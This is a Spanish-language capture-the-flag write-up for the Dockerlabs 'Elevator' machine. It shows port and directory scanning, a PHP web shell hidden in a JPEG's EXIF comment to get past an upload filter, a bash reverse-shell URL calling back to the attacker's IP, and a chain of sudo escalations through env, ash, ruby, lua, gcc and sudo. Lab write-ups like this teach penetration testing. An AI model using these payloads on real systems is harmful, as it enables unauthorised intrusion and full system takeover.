Elevator
✍️ Autor: beafn28🔍 Dificultad: Fácil 📅 Fecha de creación: 1/12/2024 🐳Dockerlabs
🔍 RECONOCIMIENTO
En primer lugar, tras conectarnos a la máquina, utilizamos el comando:
ping -c 1 172.17.0.2
para verificar la conectividad de red.

A continuación, realizamos el comando:
nmap -sVC -p- -n --min-rate 5000 172.17.0.2
para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.
🔎 EXPLORACIÓN
Se utiliza el comando:
sudo nmap -sCV -p80 -v 172.17.0.2
para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sobre un misterio en un ascensor.

Ahora buscaremos directorios con la herramienta Gobuster a través de:
gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Entramos en ese directorio pero no encontramos nada. Por lo que hacemos otra búsqueda de directorios.
gobuster dir -u http://172.17.0.2/themes -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x txt,html,php

Vemos un directorio /uploads
y un archivo.html
por lo que supongamos que podemos subir una Reverse Shell.

🚀 EXPLOTACIÓN
Como podemos ver solo nos deja subir archivos en formato .jpg por lo que creamos una imagen y le insertamos código malicioso.
convert -size 200x200 xc:red ~/Desktop/malicious_image.jpg
exiftool -Comment='<?php system($_GET["cmd"]); ?>' ~/Desktop/malicious_image.jpg
Subimos la imagen y nos vamos al directorio /uploads
.

Nos ponemos en escucha.
nc -nlvp 443
Mientras en el buscador.
http://172.17.0.2/themes/uploads/6748e39cbd8ea.jpg.php?cmd=bash%20-c%20%22bash%20-i%20>%26%20/dev/tcp/192.168.255.136/443%200>%261%22

Hacemos el tratamiento de la TTY para trabajar más cómodos.
🔐 PRIVILEGIOS
Al estar dentro y ejecutar:
whoami
aún no somos root, por lo que hacemos:
sudo -l
para ver si hay algo para explotar.

Nos llama la atención env por lo que buscamos en esta página cómo explotarlo.
sudo -u daphne /usr/bin/env /bin/sh

Ya somos daphne.

Nos llama la atención ash por lo que buscamos en esta página cómo explotarlo.
sudo -u vilma /usr/bin/ash

Ya somos vilma.

Nos llama la atención ruby por lo que buscamos en esta página cómo explotarlo.
sudo -u shaggy /usr/bin/ruby -e 'exec "/bin/sh"'

Ya somos shaggy.

Nos llama la atención lua por lo que buscamos en esta página cómo explotarlo.
sudo -u fred /usr/bin/lua -e 'os.execute("/bin/sh")'

Ya somos fred.

Nos llama la atención gcc por lo que buscamos en esta página cómo explotarlo.
sudo -u scooby /usr/bin/gcc -wrapper /bin/sh,-s .

Ya somos scooby.

Nos llama la atención sudo por lo que buscamos en esta página cómo explotarlo.
sudo -u root /usr/bin/sudo /bin/sh

Last updated
Was this helpful?